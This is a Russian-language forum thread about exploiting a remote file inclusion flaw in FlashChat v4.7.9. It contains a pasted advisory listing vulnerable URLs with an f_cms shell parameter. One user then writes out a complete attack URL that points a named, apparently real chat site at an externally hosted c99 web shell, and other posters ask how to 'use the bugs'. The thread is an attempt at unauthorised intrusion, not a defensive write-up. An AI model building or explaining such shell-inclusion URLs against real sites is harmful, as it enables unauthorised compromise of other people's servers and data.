Script : FlashChat v4.7.9
Download : files.filefront.com/FlashChat+v479rar/;7192354;/fileinfo.html
--------------------------
B.Files :
connection.php >Require_once($f_cms);
common.php > Require_once($f_cms);
--------------------------
Exploits :
http://www.example.com/chat/incclasses/connection.php?f_cms=[Shell-Attack]
http://www.example.com/chat/inc/common.php?f_cms=[Shell-Attack]
-------------------------

Как я понимаю вместо [Shell-Attack] нужно вставить ссылку на шелл и он должен загрузиться на сайт с установленным чатом, но ничего не получается((( объясните плиз что я неправильно делаю... и как этой уязвимостью пользоваться :)

Script : FlashChat v4.7.9
Download : files.filefront.com/FlashChat+v479rar/;7192354;/fileinfo.html
--------------------------
B.Files :
connection.php >Require_once($f_cms);
common.php > Require_once($f_cms);
--------------------------
Exploits :
http://www.example.com/chat/incclasses/connection.php?f_cms=[Shell-Attack]
http://www.example.com/chat/inc/common.php?f_cms=[Shell-Attack]
-------------------------

Как я понимаю вместо [Shell-Attack] нужно вставить ссылку на шелл и он должен загрузиться на сайт с установленным чатом, но ничего не получается((( объясните плиз что я неправильно делаю... и как этой уязвимостью пользоваться :)
Лучше скинь ссылку, я не могу понять что у тебя не получается. А то ты просто переписал багтрак.

ну допустим чат здесь: http://www.pesleague.com/forum/chat/flashchat.php
шелл здесь: http://burny.fromru.com/c99madshell.php

итоге получается http://www.pesleague.com/forum/chat/incclasses/connection.php?f_cms=http://burny.fromru.com/c99madshell.php
и как я понял получившаяся ссылка должна запустить шелл на pc-center.com.ua... но ничего не получается :(
или я все неправильно делаю и не так понял?

:(

Nefix,
а ты зайди по адресу h__p://www.pesleague.com/forum/chat/incclasses/connection.php и сам думаю догадаешься..

действительно объясните как юзать баги